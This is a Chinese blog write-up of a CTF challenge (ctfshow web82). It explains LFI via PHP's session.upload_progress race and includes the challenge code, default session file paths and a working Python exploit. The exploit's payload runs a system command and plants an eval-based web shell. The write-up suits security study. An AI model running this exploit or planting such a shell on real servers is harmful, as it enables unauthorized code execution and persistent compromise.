利用session.upload_progress进行文件包含

前言

又一种新的文件包含利用方法,记录一下复现过程。

学习自:LFI 绕过 Session 包含限制 Getshell
利用session.upload_progress进行文件包含和反序列化渗透


kali本地复现漏洞

所有配置都为默认配置

大概原理:利用session.upload_progress上传一个临时文件,该文件里面有我们上传的恶意代码,然后包含它,从而执行里面的代码。因为该文件内容清空很快,所以需要不停的上传和包含,在清空之前包含该文件。

kali的html目录下写一个1.php
在这里插入图片描述然后不停发包
在这里插入图片描述可以看到目录下已经有了该临时文件,该临时文件因为默认配置session.upload_progress.cleanup = on导致文件上传后,session文件内容立即清空,
在这里插入图片描述

一直cat,终于在没清空的时候cat到了,内容如下:
在这里插入图片描述

可以看到里面有我们上传的恶意代码,如果这时候我们用1.php包含这个临时文件,就可以执行里面的恶意代码了。
在这里插入图片描述

利用burp解题

例:ctfshow-web入门82

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
} 

过滤了data和php,之前那些协议都用不了,尝试该方法。

利用session.upload_progress上传文件

在这里插入图片描述
这里cookie里PHPSESSID的值决定了我们上传临时文件名,payload可以如下设置
在这里插入图片描述
然后在尝试包含我们上传的文件,文件名默认为sess_再加上我们传的PHPSESSID值,比如我们这里为Cookie: PHPSESSID=ctf所以文件名为sess_ctf,默认路径有下面几个:

默认路径

/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID

这道题为/tmp/sess_ctf,不知道可以一个一个测试,再一直发包含/tmp/sess_ctf的包。
在这里插入图片描述

可以看到已经成功包含临时文件,并读取到了flag

在这里插入图片描述

利用python脚本解题

也直接用前面文章里的脚本:

import io
import sys
import requests
import threading

sessid = 'Qftm'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            'http://250307c3-cf87-4811-987f-20189fa2442c.chall.ctf.show/',
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat *');fputs(fopen('shell.php','w'),'<?php @eval($_POST[mtfQ])?>');?>"},
            files={"file":('q.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'http://250307c3-cf87-4811-987f-20189fa2442c.chall.ctf.show/?file=/tmp/sess_{sessid}')
        if 'flag' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()

    READ(session)

改下网址和要执行的shell即可
在这里插入图片描述

  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值